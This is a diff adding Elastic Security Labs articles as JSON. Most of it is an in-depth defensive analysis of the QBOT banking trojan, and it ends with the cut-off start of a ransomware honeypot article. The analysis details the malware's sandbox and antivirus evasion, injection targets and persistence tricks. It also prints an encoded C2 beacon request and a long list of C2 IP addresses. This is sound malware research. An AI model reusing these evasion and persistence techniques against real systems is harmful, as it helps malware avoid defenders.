+ "title": "QBOT Configuration Extractor",
+ "slug": "qbot-configuration-extractor",
+ "subtitle": "Configuration extraction tool for QBOT malware",
+ "date": "2022-12-06",
+ "description": "Python script to extract the configuration from QBOT samples.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "qbot",
+ "ref3726",
+ "qakbot"
+ ]
+ },
+ "id": "security_labs_content-qbot_configuration_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_malware_analysis-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_malware_analysis-md.json
new file mode 100644
index 00000000000..a071e4fc330
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_malware_analysis-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"QBOT Malware Analysis\"\nslug: \"qbot-malware-analysis\"\ndate: \"2023-02-14\"\ndescription: \"Elastic Security Labs releases a QBOT malware analysis report covering the execution chain. From this research, the team has produced a YARA rule, configuration-extractor, and indicators of compromises (IOCs).\"\nauthor:\n - slug: cyril-francois\nimage: \"blog-thumb-drill-bit.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - ref3726\n - qbot\n - qakbot\n---\n\n## Key takeaways\n\n- Elastic Security Labs is releasing a QBOT malware analysis report from a recent [campaign](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern)\n- This report covers the execution chain from initial infection to communication with its command and control containing details about in depth features such as its injection mechanism and dynamic persistence mechanism.\n- From this research we produced a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Qbot.yar), [configuration-extractor](https://www.elastic.co/security-labs/qbot-configuration-extractor), and indicators of compromises (IOCs)\n\n## Preamble\n\nAs part of our mission to build knowledge about the most common malware families targeting institutions and individuals, the Elastic Malware and Reverse Engineering team (MARE) completed the analysis of the core component of the banking trojan QBOT/QAKBOT V4 from a previously reported [campaign](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern).\n\nQBOT — also known as QAKBOT — is a modular Trojan active since 2007 used to download and run binaries on a target machine. This document describes the in-depth reverse engineering of the QBOT V4 core components. 
It covers the execution flow of the binary from launch to communication with its command and control (C2).\n\nQBOT is a multistage, multiprocess binary that has capabilities for evading detection, escalating privileges, configuring persistence, and communicating with C2 through a set of IP addresses. The C2 can update QBOT, upload new IP addresses, upload and run fileless binaries, and execute shell commands.\n\nAs a result of this analysis, MARE has produced a new YARA rule based on the core component of QBOT as well as a static configuration extractor able to extract and decrypt its strings, its configuration, and its C2 IP address list.\n\n> For information on the QBOT configuration extractor and malware analysis, check out our blog posts detailing this:\n>\n> - [QBOT Configuration Extractor](https://www.elastic.co/security-labs/qbot-configuration-extractor)\n> - [QBOT Attack Pattern](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern)\n\n## Execution flow\n\nThis section describes the QBOT execution flow in the following three stages:\n\n- First Stage: Initialization\n- Second Stage: Installation\n- Third Stage: Communication\n\n### Stage 1\n\n\n\nThe sample is executed with the **regsvr32.exe** binary, which in turn will call QBOT’s **DllRegisterServer** export:\n\n\n\nAfter execution, QBOT checks if it’s running under the Windows Defender sandbox by checking the existence of a specific subdirectory titled **C:\\\\INTERNAL\\\\\\_\\_empty**; if this folder exists, the malware terminates itself:\n\n\n\nThe malware will then enumerate running processes to detect any antivirus (AV) products on the machine. The image below contains a list of AV vendors QBOT reacts to:\n\n\n\nAV detection will not prevent QBOT from running. However, it will change its behavior in later stages. 
In order to generate a seed for its pseudorandom number generator (PRNG), QBOT generates a fingerprint of the computer by using the following expression:\n\n```\n**fingerprint = CRC32(computerName + CVolumeSerialNumber + AccountName)**\n```\n\nIf the **“C:”** volume doesn’t exist the expression below is used instead:\n\n```\n**fingerprint = CRC32(computerName + AccountName)**\n```\n\nFinally, QBOT will choose a set of targets to inject into depending on the AVs previously detected and the machine architecture:\n\n| AV detected & architecture | Targets |\n| --- | --- |\n| BitDefender / Kaspersky / Sophos / TrendMicro & x86 | %SystemRoot%\\\\SysWOW64\\\\mobsync.exe, %SystemRoot%\\\\SysWOW64\\\\explorer.exe |\n| BitDefender / Kaspersky / Sophos / TrendMicro & x64 | %SystemRoot%\\\\System32\\\\mobsync.exe, %SystemRoot%\\\\explorer.exe, %ProgramFiles%\\\\Internet Explorer\\\\iexplore.exe |\n| Avast / AVG / Windows Defender & x86 | %SystemRoot%\\\\SysWOW64\\\\OneDriveSetup.exe, %SystemRoot%\\\\SysWOW64\\\\msra.exe, %ProgramFiles(x86)%\\\\Internet Explorer\\\\iexplore.exe |\n| Avast / AVG / Windows Defender & x64 | %SystemRoot%\\\\System32\\\\OneDriveSetup.exe, %SystemRoot%\\\\System32\\\\msra.exe |\n| x86 | %SystemRoot%\\\\explorer.exe, %SystemRoot%\\\\System32\\\\msra.exe, %SystemRoot%\\\\System32\\\\OneDriveSetup.exe |\n| x64 | %SystemRoot%\\\\SysWOW64\\\\explorer.exe, %SystemRoot%\\\\SysWOW64\\\\msra.exe, %SystemRoot%\\\\System32\\\\OneDriveSetup.exe |\n\nQBOT will try to inject itself iteratively, using its second 
stage as an entry point, into one of its targets– choosing the next target process if the injection fails. Below is an example of QBOT injecting into **explorer.exe**.\n\n\n\n### Stage 2\n\n\n\nQBOT begins its second stage by saving the content of its binary in memory and then corrupting the file on disk:\n\n\n\nThe malware then loads its configuration from one of its resource sections:\n\n\n\nQBOT also has the capability to load its configuration from a **.cfg** file if available in the process root directory:\n\n\n\nAfter loading its configuration, QBOT proceeds to install itself on the machine– initially by writing its internal configuration to the registry:\n\n\n\nShortly after, QBOT creates a persistence subdirectory with a randomly-generated name under the **%APPDATA%\\Microsoft** directory. This folder is used to drop the in-memory QBOT binary for persistence across reboot:\n\n\n\nAt this point, the folder will be empty because the malware will only drop the binary if a shutdown/reboot event is detected. This “contingency” binary will be deleted after reboot.\n\nQBOT will attempt the same install process for all users and try to either execute the malware within the user session if it exists, or create a value under the **CurrentVersion\\Run** registry key for the targeted user to launch the malware at the next login. Our analysis didn’t manage to reproduce this behavior on an updated Windows 10 machine. The only artifact observed is the randomly generated persistence folder created under the user **%APPDATA%\\Microsoft** directory:\n\n\n\nQBOT finishes its second stage by restoring the content of its corrupted binary and registering a task via **Schtask** to launch a QBOT service under the **NT AUTHORITY\\SYSTEM** account.\n\nThe first stage has a special execution path where it registers a service handler if the process is running under the **SYSTEM** account. 
The QBOT service then executes stages 2 and 3 as normal, corrupting the binary yet again and executing commands on behalf of other QBOT processes via messages received through a randomly generated named pipe:\n\n\n\n### Stage 3\n\n\n\nQBOT begins its third stage by registering a window and console event handler to monitor suspend/resume and shutdown/reboot events. Monitoring these events enables the malware to install persistence dynamically by dropping a copy of the QBOT binary in the persistence folder and creating a value under the **CurrentVersion\\Run** registry key:\n\n\n\nAt reboot, QBOT will take care of deleting any persistence artifacts.\n\nThe malware will proceed to create a watchdog thread to monitor running processes against a hardcoded list of binaries every second. If any process matches, a registry value is set that will then change QBOT behavior to use randomly generated IP addresses instead of the real one, thus never reaching its command and control:\n\n| | | |\n| --- | --- | --- |\n| frida-winjector-helper-32.exe, frida-winjector-helper-64.exe, Tcpdump.exe, windump.exe, ethereal.exe, wireshark.exe, ettercap.exe, rtsniff.exe, packetcapture.exe, capturenet.exe, qak_proxy | dumpcap.exe, CFF Explorer.exe, not_rundll32.exe, ProcessHacker.exe, tcpview.exe, filemon.exe, procmon.exe, idaq64.exe, PETools.exe, ImportREC.exe, LordPE.exe | SysInspector.exe, proc_analyzer.exe, sysAnalyzer.exe, sniff_hit.exe, joeboxcontrol.exe, joeboxserver.exe, ResourceHacker.exe, x64dbg.exe, Fiddler.exe, sniff_hit.exe, sysAnalyzer.exe |\n\nQBOT will then load its domains from one 
of its **.rsrc** files and from the registry, as every domain update received from its C2 will be part of its configuration written to the registry. See Extracted Network Infrastructure in Appendix A.\n\nFinally, the malware starts communicating with C2 via HTTP and TLS. The underlying protocol uses a JSON object encapsulated within an enciphered message which is then base64-encoded:\n\n\n\nBelow is an example of an HTTP POST request sent by QBOT to its C2:\n\n```\nAccept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\nHost: 181.118.183.98\nContent-Length: 77\nCache-Control: no-cache\n\nqxlbjrbj=NnySaFAKLt+YgjH3UET8U6AUwT9Lg51z6zC+ufeAjt4amZAXkIyDup74MImUA4do4Q==\n```\n\nThrough this communication channel, QBOT receives commands from C2 — see Appendix B (Command Handlers). Aside from management commands (update, configuration knobs), our sample only handles binary execution-related commands, but we know that the malware is modular and can be built with additional features like a VNC server, a reverse shell server, proxy support (to be part of the domains list), and numerous other capabilities.\n\n## Features\n\n### Mersenne Twister Random Number Generator\n\nQBOT uses an implementation of [Mersenne Twister Random Number Generator](https://www.sciencedirect.com/topics/computer-science/mersenne-twister) (MTRNG) to generate random values:\n\n\n\nThe MTRNG engine is then used by various functions to generate different types of data, for example for generating registry key values and persistence folders. As QBOT needs to reproduce values, it will almost always use the computer fingerprint and a “salt” specific to the value it wants to generate:\n\n\n\n### String obfuscation\n\nAll QBOT strings are XOR-encrypted and concatenated in a single blob we call a “string bank”. 
To get a specific string the malware needs a string identifier (identifier being an offset in the string bank), a decryption key, and the targeted string bank.\n\n\n\nAs this sample has two string banks, it has four **GetString** functions currying the string bank and the decryption key parameters: One C string function and one wide string function for each string bank. Wide string functions use the same string banks, but convert the data to **utf-16**.\n\n\n\n\n\nSee Appendix C (String Deciphering Implementation).\n\n### Import obfuscation\n\nQBOT resolves its imports using a hash table:\n\n\n\n\n\nThe malware resolves the library name through its GetString function and then resolves the hash table with a classic library’s exports via manual parsing, comparing each export to the expected hash. In this sample, the hashing comparison algorithm uses this formula:\n\n```\n**CRC32(exportName) XOR 0x218fe95b == hash**\n```\n\n### Resource obfuscation\n\nThe malware is embedded with different resources; the common ones are the configuration and the domains list. Resources are encrypted the same way: The decryption key may be either embedded within the data blob or provided. Once the resource is decrypted, an embedded hash is used to check data validity.\n\n\n\nSee Appendix D (Resource Deciphering Implementation).\n\n### Cyrillic keyboard language detection\n\nAt different stages, QBOT will check if the computer uses a Cyrillic language keyboard. If it does, it prevents further execution.\n\n\n\n### AVG/AVAST special behavior\n\nAVG and Avast share the same antivirus engine. Thus if QBOT detects one of those antivirus products running, it will also check at the installation stage if one of their DLLs is loaded within the malware memory space. If so, QBOT will skip the installation phase.\n\n\n\n### Windows Defender special behavior\n\nIf QBOT is running under **SYSTEM** account, it will add its persistence folder to the Windows Defender exclusion path in the registry. 
It will also do this for the legacy Microsoft Security Essential (MSE) exclusion path if detected.\n\n\n\n### Exception list process watchdog\n\nEach second, QBOT parses running processes looking for one matching the hardcoded exception list. If any is found, a “fuse” value is set in the registry and the watchdog stops. If this fuse value is set, QBOT will not stop execution– but at the third stage, the malware will use randomly generated IP addresses and won't be able to contact C2.\n\n\n\n![QBOT using randomly generated IP address if fuse is set](/assets/images/qbot-malware-analysis/1qbot.png)\n\n### QBOT process injection\n\n#### Second stage injection\n\nTo inject its second stage into one of its hardcoded targets, QBOT uses a classic **CreateProcess** , **WriteProcessMemory** , **ResumeProcess** DLL injection technique. The malware will create a process, allocate and write the QBOT binary within the process memory, write a copy of its engine, and patch the entry point to jump to a special function. This function performs a light initialization of QBOT and its engine within the new process environment, alerts the main process of its success, and then executes the second stage.\n\n![QBOT second stage injection](/assets/images/qbot-malware-analysis/2qbot.png)\n\n![QBOT injection entry point](/assets/images/qbot-malware-analysis/3qbot.jpg)\n\n#### Injecting library from command and control\n\nQBOT uses the aforementioned method to inject libraries received from C2. The difference is that as well as mapping itself, the malware will also map the received binary and use a library loader as entry point.\n\n![QBOT DLL loader injection](/assets/images/qbot-malware-analysis/4qbot.jpg)\n\n\n\n### Multi-user installation\n\nPart of the QBOT installation process is installing itself within other users’ accounts. 
To do so, the malware enumerates each user with an account on the machine (local and domain), then dumps its configuration under the user’s **Software\\Microsoft** registry key, creates a persistence folder under the user’s **%APPDATA%\\Microsoft** folder, and finally tries to either launch QBOT under the user session if the session exists, or else creates a run key to launch the malware when the user logs in.\n\n\n\n### Dynamic persistence\n\nQBOT registers a window handler to monitor suspend/resume events. When they occur, the malware will install/uninstall persistence.\n\n![QBOT window handler registration](/assets/images/qbot-malware-analysis/7qbot.png)\n\n![QBOT window handler catching suspend/resume event](/assets/images/qbot-malware-analysis/8qbot.png)\n\nQBOT registers a console event to handle shutdown/reboot events as well.\n\n\n\n\n\n### Command and control public key pinning\n\nQBOT has a mechanism to verify the signature of every message received from its command and control. The verification mechanism is based on a public key embedded in the sample. This public key could be used to identify the campaign the sample belongs to, but this mechanism may not always be present.\n\n![QBOT command and control message processing](/assets/images/qbot-malware-analysis/1qbot.png)\n\n![Message signature verification with hardcoded command and control public key](/assets/images/qbot-malware-analysis/2qbot.png)\n\nThe public key comes from a hardcoded XOR-encrypted data blob.\n\n![Hardcoded command and control public key being XOR-decrypted](/assets/images/qbot-malware-analysis/3qbot.jpg)\n\n### Computer information gathering\n\nPart of QBOT communication with its command and control is sending information about the computer. 
Information is gathered through a set of Windows API calls, shell commands and Windows Management Instrumentation (WMI) commands:\n\n![Computer information gathering 1/2](/assets/images/qbot-malware-analysis/4qbot.jpg)\n\n\n\nOne especially interesting procedure lists installed antivirus products via WMI:\n\n\n\n### Update mechanism\n\nQBOT can receive updates from its command and control. The new binary will be written to disk, executed through a command line, and the main process will terminate.\n\n![QBOT writing to disk and running the updated binary](/assets/images/qbot-malware-analysis/7qbot.png)\n\n![QBOT stopping execution if update is running](/assets/images/qbot-malware-analysis/8qbot.png)\n\n### Process injection manager\n\nQBOT has a system to keep track of processes injected with binaries received from its command and control in order to manage them as the malware receives subsequent commands. It also has a way to serialize and save those binaries on disk in case it has to stop execution and recover execution when restarted.\n\nTo do this bookkeeping, QBOT maintains two global structures — a list of all binaries received from its command and control, and a list of running injected processes:\n\n\n\n\n\n## Conclusion\n\nThe QBOT malware family is highly active and still part of the threat landscape in 2022 due to its features and its powerful modular system. While initially characterized as an information stealer in 2007, this family has been leveraged as a delivery mechanism for additional malware and post-compromise activity.\n\nElastic Security provides out-of-the-box prevention capabilities against this threat. Existing Elastic Security users can access these capabilities within the product. 
If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). You can always get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?elektra=whats-new-elastic-security-7-16-blog).\n\n## MITRE ATT&CK Tactics and Techniques\n\nMITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- Tactic: [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)\n- Tactic: [Defense Evasion](https://attack.mitre.org/tactics/TA0005)\n- Tactic: [Discovery](https://attack.mitre.org/tactics/TA0007)\n- Tactic: [Command and Control](https://attack.mitre.org/tactics/TA0011)\n\n### Techniques / Sub Techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- Technique: [Process Injection](https://attack.mitre.org/techniques/T1055) (T1055)\n- Technique: [Modify Registry](https://attack.mitre.org/techniques/T1112) (T1112)\n- Technique: [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) (T1027)\n- Technique: [Obfuscated Files or Information: Indicator Removal from Tools](https://attack.mitre.org/techniques/T1027/005) (T1027.005)\n- Technique: [System Binary Proxy Execution: Regsvr32](https://attack.mitre.org/techniques/T1218/010) (T1218.010)\n- Technique: [Application Window Discovery](https://attack.mitre.org/techniques/T1010) 
(T1010)\n- Technique: [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) (T1083)\n- Technique: [System Information Discovery](https://attack.mitre.org/techniques/T1082) (T1082)\n- Technique: [System Location Discovery](https://attack.mitre.org/techniques/T1614) (T1614)\n- Technique: [Software Discovery: Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) (T1518.001)\n- Technique: [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) (T1033)\n- Technique: [Application Layer Protocol: Web Protocols](https://attack.mitre.org/techniques/T1071/001) (T1071.001)\n\n## Observations\n\nWhile not specific enough to be considered indicators of compromise, the following information was observed during analysis that can help when investigating suspicious events.\n\n### File System\n\n**Persistence folder**\n\n```\n**%APPDATA%\\Microsoft\\[Random Folder]**\n```\n\n**Example:**\n\n```\n**C:\\Users\\Arx\\AppData\\Roaming\\Microsoft\\Vuhys**\n```\n\n### Registry\n\n**Scan Exclusion**\n\n```\n**HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[Persistence Folder]**\n```\n\n**Example:**\n\n```\n**HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\Arx\\AppData\\Roaming\\Microsoft\\Blqgeaf**\n```\n\n### Configuration\n\n**Configuration**\n\n```\n**HKU\\[User SID]\\Software\\Microsoft\\[Random Key]\\[Random Value 0]**\n```\n\n**Example:**\n\n```\n**HKU\\S-1-5-21-2844492762-1358964462-3296191067-1000\\Software\\Microsoft\\Silhmfua\\28e2a7e8**\n```\n\n## Appendices\n\n### Appendix A (extracted network infrastructure)\n\n| | | |\n| 
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | 
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| 1.161.71.109:4431.161.71.109:995100.1.108.246:443101.50.103.193:995102.182.232.3:995103.107.113.120:443103.139.243.207:990103.246.242.202:443103.87.95.133:2222103.88.226.30:443105.226.83.196:995108.60.213.141:443109.12.111.14:443109.228.220.196:443113.11.89.165:995117.248.109.38:21120.150.218.241:995120.61.2.95:443121.74.167.191:995125.168.47.127:2222138.204.24.70:443140.82.49.12:443140.82.63.183:443140.82.63.183:995143.0.34.185:443144.202.2.175:443144.202.2.175:995144.202.3.39:443144.202.3.39:995148.64.96.100:443149.28.238.199:443149.28.238.199:995172.114.160.81:995172.115.177.204:2222173.174.216.62:443173.21.10.71:2222174.69.215.101:443175.145.235.37:443176.205.119.81:2078176.67.56.94:443176.88.238.122:995179.158.105.44:443180.129.102.214:995180.183.128.80:2222181.118.183.98:443181.208.248.227:443181.62.0.59:443182.191.92.203:995182.253.189.74:2222185.69.144.209:443 | 
186.105.121.166:443187.102.135.142:2222187.207.48.194:61202187.250.114.15:443187.251.132.144:22190.252.242.69:443190.73.3.148:2222191.17.223.93:32101191.34.199.129:443191.99.191.28:443196.233.79.3:80197.167.62.14:993197.205.127.234:443197.89.108.252:4432.50.137.197:443201.145.189.252:443201.211.64.196:2222202.134.152.2:2222203.122.46.130:443208.107.221.224:443209.197.176.40:995217.128.122.65:2222217.164.210.192:443217.165.147.83:99324.178.196.158:222224.43.99.75:44331.35.28.29:44331.48.166.122:207832.221.224.140:99537.186.54.254:99537.34.253.233:44338.70.253.226:222239.41.158.185:99539.44.144.159:99539.52.75.201:99539.57.76.82:99540.134.246.185:99541.228.22.180:44341.230.62.211:99341.38.167.179:99541.84.237.10:99542.235.146.7:222245.241.232.25:99545.46.53.140:222245.63.1.12:44345.63.1.12:99545.76.167.26:44345.76.167.26:99545.9.20.200:44346.107.48.202:443 | 47.156.191.217:44347.180.172.159:44347.180.172.159:5001047.23.89.62:99347.23.89.62:9955.32.41.45:4435.95.58.211:208766.98.42.102:44367.209.195.198:44368.204.7.158:44370.46.220.114:44370.51.138.126:222271.13.93.154:222271.74.12.34:44372.12.115.90:2272.252.201.34:99572.76.94.99:44373.151.236.31:44373.67.152.98:222274.15.2.252:222275.113.214.234:222275.99.168.194:44375.99.168.194:6120176.169.147.192:3210376.25.142.196:44376.69.155.202:222276.70.9.169:222278.87.206.213:99580.11.74.81:222281.215.196.174:44382.152.39.39:44383.110.75.97:222284.241.8.23:3210385.246.82.244:44386.97.11.43:44386.98.208.214:222286.98.33.141:44386.98.33.141:99588.228.250.126:44389.211.181.64:222290.120.65.153:207891.177.173.10:99592.132.172.197:222293.48.80.198:99594.36.195.250:222294.59.138.62:119494.59.138.62:222296.21.251.127:222296.29.208.97:44396.37.113.36:993 |\n\n### Appendix B (command handlers)\n\n| Id | Handler |\n| ---- | ------------------------------------------------------------------------------- |\n| 0x1 | MARE::rpc::handler::CommunicateWithC2 |\n| 0x6 | MARE::rpc::handler::EnableGlobalRegistryConfigurationValuek0x14 |\n| 0x7 
| MARE::rpc::handler::DisableGlobalRegistryConfigurationValuek0x14 |\n| 0xa | MARE::rpc::handler::KillProcess |\n| 0xc | MARE::rpc::handler::SetBunchOfGlobalRegistryConfigurationValuesAndTriggerEvent1 |\n| 0xd | MARE::rpc::handler::SetBunchOfGlobalRegistryConfigurationValuesAndTriggerEvent0 |\n| 0xe | MARE::rpc::handler::DoEvasionMove |\n| 0x12 | MARE::rpc::handler::NotImplemented |\n| 0x13 | MARE::rpc::handler::UploadAndRunUpdatedQBOT0 |\n| 0x14 | MARE::rpc::handler::Unk0 |\n| 0x15 | MARE::rpc::handler::Unk1 |\n| 0x19 | MARE::rpc::handler::UploadAndExecuteBinary |\n| 0x1A | MARE::rpc::handler::UploadAndInjectDll0 |\n| 0x1B | MARE::rpc::handler::DoInjectionFromDllToInjectByStr |\n| 0x1C | MARE::rpc::handler::KillInjectedProcessAndDisableDllToInject |\n| 0x1D | MARE::rpc::handler::Unk3 |\n| 0x1E | MARE::rpc::handler::KillInjectedProcessAndDoInjectionAgainByStr |\n| 0x1F | MARE::rpc::handler::FastInjectdll |\n| 0x21 | MARE::rpc::handler::ExecuteShellCmd |\n| 0x23 | MARE::rpc::handler::UploadAndInjectDll1 |\n| 0x24 | MARE::rpc::handler::UploadAndRunUpdatedQBOT1 |\n| 0x25 | MARE::rpc::handler::SetValueToGlobalRegistryConfiguration |\n| 0x26 | MARE::rpc::handler::DeleteValueFromGlobalRegistryConfiguration |\n| 0x27 | MARE::rpc::handler::ExecutePowershellCmd |\n| 0x28 | MARE::rpc::handler::UploadAndRunDllWithRegsvr32 |\n| 0x29 | MARE::rpc::handler::UploadAndRunDllWithRundll32 |\n\n### Appendix C (string deciphering implementation)\n\n```\ndef decipher_strings(data: bytes, key: bytes) -> dict[int, bytes]:\n    result = dict()\n    current_index = 0\n    current_string = list()\n    for i in range(len(data)):\n        current_string.append(data[i] ^ key[i % len(key)])\n        if data[i] == key[i % len(key)]:\n            result[current_index] = bytes(current_string)\n            current_string = list()\n            current_index = i + 1\n    return result\n```\n\n### Appendix D (resource deciphering implementation)\n\n```\nfrom Crypto.Cipher import ARC4\nfrom Crypto.Hash import SHA1\n\ndef decipher_data(data: bytes, key: bytes) -> tuple[bytes, 
bytes]:\n    data = ARC4.ARC4Cipher(SHA1.SHA1Hash(key).digest()).decrypt(data)\n    return data[20:], data[:20]\n\n\ndef verify_hash(data: bytes, expected_hash: bytes) -> bool:\n    return SHA1.SHA1Hash(data).digest() == expected_hash\n\n\ndef decipher_rsrc(rsrc: bytes, key: bytes) -> bytes:\n    deciphered_rsrc, expected_hash = decipher_data(rsrc[20:], rsrc[:20])\n    if not verify_hash(deciphered_rsrc, expected_hash):\n        deciphered_rsrc, expected_hash = decipher_data(rsrc, key)\n        if not verify_hash(deciphered_rsrc, expected_hash):\n            raise RuntimeError('Failed to decipher rsrc: Mismatching hashes.')\n    return deciphered_rsrc\n```\n"
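The Appendix C routine can be sanity-checked end-to-end with fabricated data: XOR a blob of NUL-terminated strings with a key, then confirm the deciphering splits the strings back out at their original offsets. The key and plaintext below are made up purely for illustration; they are not from a real sample.

```python
def decipher_strings(data: bytes, key: bytes) -> dict:
    # Same splitting logic as Appendix C: XOR-decode, and cut a new string
    # whenever the deciphered byte is 0 (i.e., data[i] == key[i % len(key)]).
    result = dict()
    current_index = 0
    current_string = list()
    for i in range(len(data)):
        current_string.append(data[i] ^ key[i % len(key)])
        if data[i] == key[i % len(key)]:
            result[current_index] = bytes(current_string)
            current_string = list()
            current_index = i + 1
    return result

# Fabricated example: two NUL-terminated strings XORed with a made-up key.
key = b"KAY"  # hypothetical key, for illustration only
plaintext = b"foo\x00bar\x00"
blob = bytes(p ^ key[i % len(key)] for i, p in enumerate(plaintext))

strings = decipher_strings(blob, key)  # {0: b'foo\x00', 4: b'bar\x00'}
```

The returned dictionary is keyed by each string's offset inside the blob, and each recovered string keeps its NUL terminator.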
+ },
+ "title": "QBOT Malware Analysis",
+ "slug": "qbot-malware-analysis",
+ "date": "2023-02-14",
+ "description": "Elastic Security Labs releases a QBOT malware analysis report covering the execution chain. From this research, the team has produced a YARA rule, configuration-extractor, and indicators of compromise (IOCs).",
+ "author": [
+ {
+ "slug": "cyril-francois"
+ }
+ ],
+ "image": "blog-thumb-drill-bit.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "ref3726",
+ "qbot",
+ "qakbot"
+ ]
+ },
+ "id": "security_labs_content-qbot_malware_analysis-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_in_the_honeypot_how_we_capture_keys-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_in_the_honeypot_how_we_capture_keys-md.json
new file mode 100644
index 00000000000..131159ed3cc
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_in_the_honeypot_how_we_capture_keys-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Ransomware in the honeypot: how we capture keys with sticky canary files\"\nslug: \"ransomware-in-the-honeypot-how-we-capture-keys\"\ndate: \"2024-02-23\"\ndescription: \"This article describes the process of capturing encryption keys from ransomware using Elastic Defend ransomware protection.\"\nauthor:\n - slug: salim-bitam\n - slug: christophe-alladoum\nimage: \"photo-edited-07.png\"\ncategory:\n - slug: security-research\ntags: \n - ransomware\n - canary\n - honeypot\n---\n\n## TL;DR\n\n\n\n\nAt Elastic, we have bi-annual ON Weeks, where engineers break into “hack-a-thon” teams to tackle a technical challenge voted on by the team. This article presents the outcome of [yet another](https://www.elastic.co/security-labs/deep-dive-into-the-ttd-ecosystem) Elastic ON Week, where we delved into an innovative application of Elastic Endpoint ransomware protection. Our research used our existing ransomware canary protection, deployed since 7.14, to generate memory snapshots (i.e., data collections that record process information) of the process(es) identified as ransomware. Through analysis of these snapshots, our research illustrated how we could recover critical information for the forensics process and even encryption keys, allowing for complete decryption.\n\nThis process memory snapshotting mechanism was added starting with Elastic Defend 8.11, allowing DFIR teams to find memory dumps of ransomware flagged by our ransomware protection, all within Elastic Endpoint’s secure installation folder (by default, ```$ElasticInstallPath\\Endpoint\\cache\\RansomwareDumps```). \n\n## Introduction\n\nIn 2024, we don't need to explain what ransomware is or the multibillion-dollar industry it's become or explain how even companies with unlimited budgets struggle to contain or prevent it. 
These adversaries are mature and efficient, often outpacing security functions like forensic and malware analysis.\n\n### Current state of protection\n\nThankfully, over the years, AVs/EDRs have become increasingly better at detecting and preventing ransomware. Among the most common existing mitigations, we find: \n\n - Static and dynamic signature-based detection: usually performed at various levels (through hashes at the file or ELF/PE section level) and on file activity (write access to files with high-entropy changes). It has the advantage of being easy and fast to implement, but is also likely to generate false positives \n - Reverse engineering: Reversing binaries can expose new ways to interfere with execution, as malware authors implement OS-level fail-safes (for instance, through Mutant objects) and/or network fail-safes (like WANNACRY) \n - Recovery backups: These are not always thoroughly tested, and even if they’re working, there is a risk of data loss between the last backup and the moment of infection \n - Shadow copies: Somewhat similar to recovery backups, except that ransomware usually actively locates and attempts to destroy them prior to encrypting files on a system \n - High entropy and rapid file change: This approach is purely experimental and attempts to detect drastic changes in file content as an indicator of encryption; however, it is also very false-positive (FP) prone\n - Lastly, cryptographic weaknesses: By far the most complex mitigation, as it requires reverse engineering and cryptographic knowledge, but also luck, since analysts must hope that the author rolled their own crypto API (see the [2019 DEFCON talk](https://youtu.be/0TF9NLsGCHA) by Elastic's Mark Mager for some examples); this approach can’t work against modern OS-native cryptographic APIs as long as they’re properly implemented according to documentation\n\n### How ransomware (usually) works, and why it matters\n\nIt is imperative that we know both what we're protecting against and how it 
